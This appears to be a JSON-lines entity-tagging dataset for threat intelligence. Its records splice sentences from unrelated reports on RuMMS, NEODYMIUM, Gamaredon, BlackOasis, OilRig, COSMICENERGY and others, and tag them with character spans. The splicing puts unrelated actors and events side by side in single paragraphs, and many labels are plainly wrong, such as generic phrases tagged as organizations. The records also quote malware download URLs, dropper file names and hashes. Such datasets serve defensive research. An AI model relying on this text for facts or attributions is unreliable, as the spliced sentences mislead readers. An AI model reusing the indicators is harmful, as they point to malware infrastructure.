Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP . The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 60, "end": 81, "label": "Indicator"}, {"start": 82, "end": 90, "label": "System"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 179, "end": 199, "label": "Organization"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 417, "end": 425, "label": "Malware"}, {"start": 444, "end": 486, "label": "Vulnerability"}]} {"text": "] XXXX.ru/mms.apk ( where XXXX.ru represents the hosting provider \u2019 s domain ) , we named this malware family RuMMS . This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific area of Europe . The document leverages the common exploit aka template injection and tries to download a second stage from \u201c http://win-apu.ddns.net/apu.dot \u201d . 
In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware \u2013 a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": [{"start": 26, "end": 33, "label": "Indicator"}, {"start": 110, "end": 115, "label": "Malware"}, {"start": 145, "end": 160, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 374, "end": 405, "label": "Indicator"}, {"start": 467, "end": 479, "label": "Organization"}, {"start": 489, "end": 495, "label": "Organization"}, {"start": 506, "end": 512, "label": "System"}, {"start": 523, "end": 530, "label": "Malware"}, {"start": 562, "end": 571, "label": "Organization"}, {"start": 686, "end": 744, "label": "Organization"}]} {"text": "To lure the victims to download the malware , threat actors use SMS phishing \u2013 sending a short SMS message containing a malicious URL to the potential victims . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . Thanks to this exploit ( Remote Code Execution exploit ) the user interaction is not required , in fact the \u201c enable macro \u201d button is not shown . 
Criminals are also using malvertising via search engines to lure potential victims in .", "spans": [{"start": 228, "end": 237, "label": "Organization"}, {"start": 242, "end": 250, "label": "Organization"}, {"start": 277, "end": 292, "label": "Organization"}, {"start": 326, "end": 346, "label": "Organization"}, {"start": 374, "end": 395, "label": "Vulnerability"}, {"start": 466, "end": 471, "label": "System"}, {"start": 496, "end": 505, "label": "Organization"}, {"start": 521, "end": 581, "label": "Organization"}]} {"text": "Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware . In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns . The downloaded document has a \u201c .dot \u201d extension , used by Microsoft Of\ufb01ce to save templates for different documents with similar formats . The attackers are known for their targeting of highvalue victims , often focusing on organizations in the government , technology , and defense sectors .", "spans": [{"start": 89, "end": 94, "label": "Malware"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 224, "end": 228, "label": "Indicator"}, {"start": 251, "end": 266, "label": "System"}, {"start": 336, "end": 345, "label": "Organization"}, {"start": 379, "end": 396, "label": "Organization"}, {"start": 417, "end": 430, "label": "Organization"}, {"start": 438, "end": 448, "label": "Organization"}, {"start": 451, "end": 461, "label": "Organization"}, {"start": 468, "end": 483, "label": "Organization"}]} {"text": "Figure 1 describes this infection process and the main behaviors of RuMMS . NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 . 
Basic Information on the \u201c .dot \u201d \ufb01le are provided : The ransom note also makes reference to 3AM", "spans": [{"start": 68, "end": 73, "label": "Malware"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 92, "end": 106, "label": "Organization"}, {"start": 119, "end": 129, "label": "Organization"}, {"start": 208, "end": 212, "label": "Indicator"}, {"start": 274, "end": 277, "label": "Malware"}]} {"text": "On April 3 , 2016 , we still observed new RuMMS samples emerging in the wild . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks . Hash : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 . While COSMICENERGY \u2019s capabilities are not significantly different from previous OT malware families \u2019 , its discovery highlights several notable developments in the OT threat landscape .", "spans": [{"start": 42, "end": 47, "label": "Malware"}, {"start": 220, "end": 284, "label": "Indicator"}, {"start": 293, "end": 308, "label": "Malware"}, {"start": 368, "end": 387, "label": "Malware"}]} {"text": "The earliest identified sample , however , can be traced back to Jan. 18 , 2016 . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Threat : Gamaredon Pteranodon loader dot \ufb01le . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": [{"start": 82, "end": 91, "label": "Organization"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 149, "end": 159, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 248, "end": 258, "label": "Malware"}, {"start": 317, "end": 355, "label": "Vulnerability"}]} {"text": "Within this time period , we identified close to 300 samples belonging to this family ( all sample hashes are listed in the Appendix ) . 
NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package . Brief Description : Dot \ufb01le enabling the infection of the Gamaredon Pteranodon . Ashley Madison \u2019s parent company \u2014 Toronto - based Avid Life Media \u2014 filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 195, "end": 203, "label": "System"}, {"start": 242, "end": 251, "label": "Organization"}, {"start": 365, "end": 374, "label": "Organization"}, {"start": 375, "end": 385, "label": "Malware"}, {"start": 388, "end": 420, "label": "Organization"}, {"start": 439, "end": 454, "label": "Organization"}, {"start": 546, "end": 561, "label": "Organization"}]} {"text": "After landing on the victim \u2019 s phone , the RuMMS apps will request device administrator privileges , remove their icons to hide themselves from users , and remain running in the background to perform a series of malicious behaviors . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . Ssdeep : 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ : oI8XoWruHpp/P4 . 
COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": [{"start": 44, "end": 49, "label": "Malware"}, {"start": 274, "end": 289, "label": "Organization"}, {"start": 292, "end": 302, "label": "Organization"}, {"start": 307, "end": 316, "label": "Organization"}, {"start": 375, "end": 390, "label": "Vulnerability"}, {"start": 438, "end": 444, "label": "System"}, {"start": 503, "end": 515, "label": "Malware"}, {"start": 588, "end": 594, "label": "Malware"}, {"start": 599, "end": 608, "label": "Malware"}]} {"text": "So far we have identified the following behaviors : Sending device information to a remote command and control ( C2 ) server . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . If we decide to open the document , we see that the document is empty , but it requires the enabling of the macro . Spyware can even be used to track the device 's physical location and record from the camera or microphone .", "spans": [{"start": 146, "end": 158, "label": "Organization"}, {"start": 187, "end": 197, "label": "Organization"}, {"start": 200, "end": 209, "label": "Organization"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 243, "end": 284, "label": "Vulnerability"}, {"start": 287, "end": 300, "label": "Vulnerability"}, {"start": 347, "end": 353, "label": "System"}, {"start": 522, "end": 527, "label": "System"}, {"start": 530, "end": 537, "label": "Malware"}]} {"text": "Contacting the C2 server for instructions . 
FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group \u2014 which goes by other names , including FinFisher and Lench IT Solutions . The body of the macro can be logically divided into two distinct parts : The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 44, "end": 50, "label": "System"}, {"start": 94, "end": 102, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 261, "end": 270, "label": "Organization"}, {"start": 312, "end": 317, "label": "System"}, {"start": 373, "end": 400, "label": "Organization"}, {"start": 466, "end": 495, "label": "Organization"}]} {"text": "Sending SMS messages to financial institutions to query account balances . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . The \ufb01rst one is the setting of the registry key \u201c HKEY_CURRENT_USER\\Software\\Microsoft\\Of\ufb01ce\\ \u201d & Application.Version & _ \u201d \\Word\\Security\\ \u201d and the declaration of some other variables , such as the dropurl \u201c geticons.ddns.net \u201d . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": [{"start": 89, "end": 99, "label": "Organization"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 466, "end": 474, "label": "Organization"}, {"start": 490, "end": 495, "label": "Malware"}, {"start": 678, "end": 687, "label": "Malware"}]} {"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server . 
BlackOasis in recent months sent a wave of phishing emails . The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name \u201c templates.vbs \u201d . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": [{"start": 104, "end": 114, "label": "Organization"}, {"start": 294, "end": 307, "label": "Indicator"}, {"start": 317, "end": 325, "label": "Organization"}, {"start": 355, "end": 383, "label": "Organization"}, {"start": 400, "end": 423, "label": "Organization"}]} {"text": "Sending C2-specified SMS messages to phone numbers in the victim \u2019 s contacts . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . This vbs is properly the macro executed by the macro engine of word . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": [{"start": 80, "end": 90, "label": "Organization"}, {"start": 265, "end": 278, "label": "Organization"}]} {"text": "Forward incoming phone calls to intercept voice-based two-factor authentication . Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . Analyzing the content of \u201c templates.vbs \u201d it is possible to notice that it de\ufb01ne a variable containing a URL like \u201c http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex . ]php \u201d obtained from \u201c hxp://get-icons.ddns . 
]net/ \u201d & NlnQCJG & \u201c _ \u201d & uRDEJCn & \u201c //autoindex . ]php \u201d , where \u201c NlnQCJG \u201d is the name that identi\ufb01es the computer on the network and \u201c uRDEJCn \u201d is the serial number of drive in hexadecimal encoding . In October , U.S. Senator Elizabeth Warren and Representative Deborah Ross introduced the Ransom Disclosure Act , with the goal of better understanding how cybercriminals are operating .", "spans": [{"start": 94, "end": 103, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 175, "end": 190, "label": "Organization"}, {"start": 249, "end": 257, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}, {"start": 285, "end": 294, "label": "Organization"}, {"start": 406, "end": 419, "label": "Indicator"}, {"start": 496, "end": 551, "label": "Indicator"}, {"start": 575, "end": 656, "label": "Indicator"}, {"start": 819, "end": 848, "label": "Organization"}, {"start": 853, "end": 880, "label": "Organization"}]} {"text": "Each of these behaviors is under the control of the remote C2 server . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . From this URL it tries to download another stage then storing it into \u201c C:\\Users\\admin\\AppData\\Roaming\\ \u201d path with random name . 
NjRAT is an open - source remote access trojan ( RAT ) whose source code is freely available and is used by commodity actors and APTs , making the process of attribution more difficult .", "spans": [{"start": 88, "end": 97, "label": "Organization"}, {"start": 123, "end": 139, "label": "Vulnerability"}, {"start": 148, "end": 158, "label": "Organization"}, {"start": 343, "end": 348, "label": "Malware"}, {"start": 355, "end": 397, "label": "Malware"}, {"start": 451, "end": 467, "label": "Organization"}, {"start": 472, "end": 476, "label": "Organization"}]} {"text": "In other words , the C2 server can specify the message contents to be sent , the time period in which to forward the voice call , and the recipients of outgoing messages . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . At the end , \u201c templates.vbs \u201d script will force the machine to reboot . PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": [{"start": 183, "end": 193, "label": "Organization"}, {"start": 398, "end": 411, "label": "Indicator"}, {"start": 456, "end": 477, "label": "Organization"}]} {"text": "As part of our investigation into this malware , we emulated an infected Android device in order to communicate with the RuMMS C2 server . Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . The dropped sample is an SFX archive , like the tradition of Gamaredon implants . 
Last month , NoEscape posted 7 victims on their leak site .", "spans": [{"start": 73, "end": 80, "label": "System"}, {"start": 121, "end": 126, "label": "Malware"}, {"start": 151, "end": 166, "label": "Organization"}, {"start": 225, "end": 233, "label": "Organization"}, {"start": 246, "end": 256, "label": "Organization"}, {"start": 261, "end": 270, "label": "Organization"}, {"start": 380, "end": 391, "label": "System"}, {"start": 416, "end": 425, "label": "Organization"}, {"start": 450, "end": 458, "label": "Malware"}]} {"text": "During one session , the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers , all of which were associated with Russian financial institutions . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests . Hash : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . HHS HC3 pointed out that some emails included a subject line Victim Organization Date Business Review and gave the user the impression they were opening a secure email from their organization .", "spans": [{"start": 222, "end": 232, "label": "Organization"}, {"start": 297, "end": 302, "label": "Organization"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 366, "end": 430, "label": "Indicator"}, {"start": 433, "end": 440, "label": "Organization"}]} {"text": "At least three of the messages were intended to check a user \u2019 s account balance at the institution ( we could not confirm the purpose of the fourth ) .Through additional research , we identified several forum posts where victims complained of funds ( up to 600 rubles ) were transferred out of their accounts after RuMMS infected their phones . Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia . Threat : Gamaredon Pteranodon implant SFX archive . 
COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named \u201c Solar Polygon \u201d ( Figure 2 ) .", "spans": [{"start": 316, "end": 321, "label": "Malware"}, {"start": 346, "end": 355, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}, {"start": 445, "end": 454, "label": "Organization"}, {"start": 455, "end": 465, "label": "Malware"}, {"start": 474, "end": 485, "label": "System"}, {"start": 488, "end": 500, "label": "Malware"}, {"start": 526, "end": 544, "label": "Organization"}, {"start": 627, "end": 639, "label": "Malware"}, {"start": 656, "end": 767, "label": "Indicator"}]} {"text": "We do not know exactly how many people have been infected with RuMMS malware . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . Brief Description : SFX Archive First Stage . In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": [{"start": 63, "end": 68, "label": "Malware"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 426, "end": 433, "label": "Organization"}, {"start": 467, "end": 473, "label": "Organization"}]} {"text": "However , our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016 , with a peak in March of more than 1,100 infections . The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent . 
Ssdeep : 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv : zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv . Mandiant has tracked KillNet activity back to January 2022 , despite a claim by the collective \u2019s alleged founder that it began operations in 2021 .", "spans": [{"start": 204, "end": 210, "label": "Organization"}, {"start": 251, "end": 260, "label": "Organization"}, {"start": 386, "end": 392, "label": "System"}, {"start": 487, "end": 495, "label": "Organization"}]} {"text": "Smishing : The Major Way To Distribute RuMMS We have not observed any instances of RuMMS on Google Play or other online app stores . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . By simply opening the SFX archive , it is possible to notice two different \ufb01les that are shown below and named respectively \u201c 8957.cmd \u201d and \u201c 28847 \u201d . In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": [{"start": 39, "end": 44, "label": "Malware"}, {"start": 83, "end": 88, "label": "Malware"}, {"start": 92, "end": 103, "label": "System"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 332, "end": 359, "label": "System"}, {"start": 362, "end": 366, "label": "System"}, {"start": 491, "end": 502, "label": "Organization"}, {"start": 553, "end": 564, "label": "System"}, {"start": 657, "end": 665, "label": "Indicator"}, {"start": 674, "end": 679, "label": "Indicator"}, {"start": 715, "end": 722, "label": "Organization"}]} {"text": "Smishing ( SMS phishing ) is currently the primary way threat actors are distributing the malware . 
Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . When executed , the SFX archive will be extracted and the \u201c 8957.cmd \u201d will be run . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for \u2022 None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services \u2022 None Consider application - level controls such as web application firewalls .", "spans": [{"start": 100, "end": 112, "label": "Organization"}, {"start": 138, "end": 156, "label": "Organization"}, {"start": 309, "end": 336, "label": "System"}, {"start": 339, "end": 343, "label": "System"}, {"start": 468, "end": 479, "label": "Organization"}, {"start": 528, "end": 539, "label": "System"}, {"start": 568, "end": 576, "label": "Indicator"}, {"start": 593, "end": 611, "label": "System"}, {"start": 739, "end": 763, "label": "System"}, {"start": 768, "end": 831, "label": "Indicator"}, {"start": 863, "end": 883, "label": "Organization"}]} {"text": "The process starts when an SMS phishing message arrives at a user \u2019 s phone . We have identified the tools , techniques , and network activities used in these continuing attacks\u2014which we have dubbed Night Dragon\u2014as originating primarily in China . 
At this point , the batch script renames the \u201c 28847 \u201d \ufb01le in \u201c 28847.exe \u201d , opens it using \u201c p\ufb02jk ,fkbcerbgblfhs \u201d as password and the \ufb01le contained inside the \u201c 28847.exe \u201d \ufb01le will be renamed in \u201c WuaucltIC.exe \u201d . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 199, "end": 214, "label": "Organization"}, {"start": 295, "end": 300, "label": "Indicator"}, {"start": 312, "end": 321, "label": "Indicator"}, {"start": 412, "end": 421, "label": "Indicator"}, {"start": 449, "end": 462, "label": "Indicator"}, {"start": 494, "end": 654, "label": "Malware"}]} {"text": "An example SMS message is shown in Figure 1 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . Finally , it will be run using \u201c post.php \u201d as argument . 
But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": [{"start": 46, "end": 55, "label": "Organization"}, {"start": 240, "end": 243, "label": "Organization"}, {"start": 246, "end": 249, "label": "Organization"}, {"start": 256, "end": 279, "label": "Organization"}, {"start": 309, "end": 319, "label": "Organization"}, {"start": 470, "end": 478, "label": "Indicator"}, {"start": 569, "end": 585, "label": "Vulnerability"}, {"start": 643, "end": 647, "label": "Organization"}]} {"text": "The message translates roughly to \u201c You got a photo in MMS format : hxxp : //yyyyyyyy.XXXX.ru/mms.apk. \u201d So far we identified seven different URLs being used to spread RuMMS in the wild . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . The fact that the \u201c 28847.exe \u201d \ufb01le can be opened makes us understand that the \u201c 28847 \u201d \ufb01le is another SFX \ufb01le . 
LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments , but also for modifications to files already present within their installed OT applications and services .", "spans": [{"start": 68, "end": 102, "label": "Indicator"}, {"start": 168, "end": 173, "label": "Malware"}, {"start": 188, "end": 197, "label": "Organization"}, {"start": 382, "end": 385, "label": "Organization"}, {"start": 388, "end": 391, "label": "Organization"}, {"start": 398, "end": 421, "label": "Organization"}, {"start": 451, "end": 461, "label": "Organization"}, {"start": 599, "end": 608, "label": "Indicator"}, {"start": 660, "end": 665, "label": "Indicator"}, {"start": 683, "end": 686, "label": "System"}, {"start": 693, "end": 711, "label": "Organization"}, {"start": 940, "end": 955, "label": "System"}]} {"text": "All of the URLs reference the file \u201c mms.apk \u201d and all use the domain \u201c XXXX.ru \u201d , which belongs to a top five shared hosting platform in Russia ( the domain itself has been obfuscated to anonymize the provider ) . The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker . 
Some static information about SFX are : New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": [{"start": 37, "end": 44, "label": "Indicator"}, {"start": 72, "end": 79, "label": "Indicator"}, {"start": 258, "end": 270, "label": "Organization"}, {"start": 354, "end": 363, "label": "System"}, {"start": 429, "end": 437, "label": "Organization"}, {"start": 470, "end": 473, "label": "System"}, {"start": 502, "end": 513, "label": "Organization"}]} {"text": "The threat actors registered at least seven subdomains through the hosting provider , each consisting of eight random-looking characters ( asdfgjcr , cacama18 , cacamadf , konkonq2 , mmsmtsh5 , riveroer , and sdfkjhl2 . While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry . Hash : 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 . Bundles of Data in the Wrong Place \"", "spans": [{"start": 139, "end": 147, "label": "Indicator"}, {"start": 150, "end": 158, "label": "Indicator"}, {"start": 161, "end": 169, "label": "Indicator"}, {"start": 172, "end": 180, "label": "Indicator"}, {"start": 183, "end": 191, "label": "Indicator"}, {"start": 194, "end": 202, "label": "Indicator"}, {"start": 209, "end": 217, "label": "Indicator"}, {"start": 275, "end": 288, "label": "Organization"}, {"start": 391, "end": 455, "label": "Indicator"}, {"start": 458, "end": 492, "label": "Indicator"}]} {"text": ") As of this writing , no files were hosted at any of the links . In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums . Threat : Gamaredon Pteranodon implant SFX archive . 
Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": [{"start": 84, "end": 93, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 217, "end": 227, "label": "Malware"}, {"start": 236, "end": 247, "label": "System"}]} {"text": "The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 . Brief Description : SFX Archive Second Stage . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 204, "end": 210, "label": "Organization"}, {"start": 267, "end": 274, "label": "Organization"}, {"start": 331, "end": 342, "label": "System"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 413, "end": 427, "label": "System"}]} {"text": "Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection . Ssdeep : 24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM : OoZwxVvfoaPu . 
The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 149, "end": 155, "label": "Organization"}, {"start": 186, "end": 214, "label": "System"}, {"start": 260, "end": 266, "label": "System"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 383, "end": 393, "label": "Organization"}]} {"text": "It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target . We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle . Exploring it , it is possible to see several \ufb01les inside of it , as well as the 6323 \ufb01le . However , if the adversary exploits a ZeroDay vulnerability and develops a new virus to infiltrate the system , traditional signaturebased network security tools will fail to defend against the attack .", "spans": [{"start": 151, "end": 168, "label": "System"}, {"start": 206, "end": 218, "label": "Organization"}, {"start": 348, "end": 352, "label": "Indicator"}, {"start": 376, "end": 385, "label": "Organization"}, {"start": 397, "end": 418, "label": "Vulnerability"}, {"start": 438, "end": 443, "label": "Malware"}, {"start": 471, "end": 520, "label": "System"}]} {"text": "Many top providers in Russia offer cheap prices for their shared hosting services , and some even provide free 30-day trial periods . On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents . In this case , the SFX archive contains 8 \ufb01les : \ufb01ve of them are legit DLLs used by the \u201c 6323 \u201d executable to interoperate with the OLE format de\ufb01ned and used by Microsoft Of\ufb01ce . 
The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": [{"start": 161, "end": 166, "label": "Organization"}, {"start": 216, "end": 244, "label": "System"}, {"start": 266, "end": 277, "label": "Indicator"}, {"start": 318, "end": 322, "label": "System"}, {"start": 337, "end": 341, "label": "Indicator"}, {"start": 380, "end": 383, "label": "System"}, {"start": 410, "end": 425, "label": "System"}, {"start": 428, "end": 437, "label": "Organization"}, {"start": 488, "end": 498, "label": "Organization"}]} {"text": "Threat actors can register subdomains through the hosting provider and use the provider \u2019 s services for a short-period campaign . The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection . The \u201c ExcelMyMacros.txt \u201d and \u201c wordMacros.txt \u201d \ufb01les contain further macro script , described next . k 32 Base64 characters , referred to as Access key in the ransom note", "spans": [{"start": 135, "end": 140, "label": "Organization"}, {"start": 319, "end": 336, "label": "Indicator"}, {"start": 345, "end": 359, "label": "Indicator"}, {"start": 417, "end": 484, "label": "Indicator"}]} {"text": "A few days later they can cancel the trial and do not need to pay a penny . In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user . So , static analysis on the \u201c 6323 \u201d \ufb01le shown as its nature : it is written using Microsoft Visual Studio .NET , therefore easily to reverse . 
These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": [{"start": 167, "end": 172, "label": "Organization"}, {"start": 280, "end": 284, "label": "Indicator"}, {"start": 333, "end": 361, "label": "System"}, {"start": 445, "end": 457, "label": "Malware"}]} {"text": "In addition , these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct ( or compromise ) themselves . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Before reversing the executable , it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code . Researchers have linked the group with low confidence to APT33 and APT34 .", "spans": [{"start": 231, "end": 237, "label": "Organization"}, {"start": 245, "end": 273, "label": "Malware"}, {"start": 449, "end": 473, "label": "Malware"}, {"start": 478, "end": 500, "label": "Malware"}, {"start": 669, "end": 678, "label": "Organization"}, {"start": 702, "end": 707, "label": "Organization"}, {"start": 712, "end": 717, "label": "Organization"}]} {"text": "RuMMS Code Analysis All RuMMS samples share the same behaviors , major parts of which are shown in Figure 1 . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective . The below image shows the information about the sample before and after the cleaning . 
The challenge of investigating a vulnerable appliance for the exploitation CVE-2023 - 4966 is that the webserver running on the appliance does not record requests ( or errors ) to the vulnerable endpoint .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 24, "end": 29, "label": "Malware"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 152, "end": 164, "label": "Organization"}, {"start": 192, "end": 210, "label": "System"}, {"start": 442, "end": 457, "label": "Vulnerability"}]} {"text": "However , the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools . Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 . The \ufb01rst check performed is on the arguments : if the arguments length is equal to zero , the malware terminates the execution . Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": [{"start": 167, "end": 173, "label": "Organization"}, {"start": 418, "end": 422, "label": "Organization"}, {"start": 545, "end": 555, "label": "Vulnerability"}, {"start": 559, "end": 574, "label": "System"}]} {"text": "We used a sample app named \u201c org.starsizew \u201d with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS \u2019 s code . In recent attacks they set up a fake VPN Web 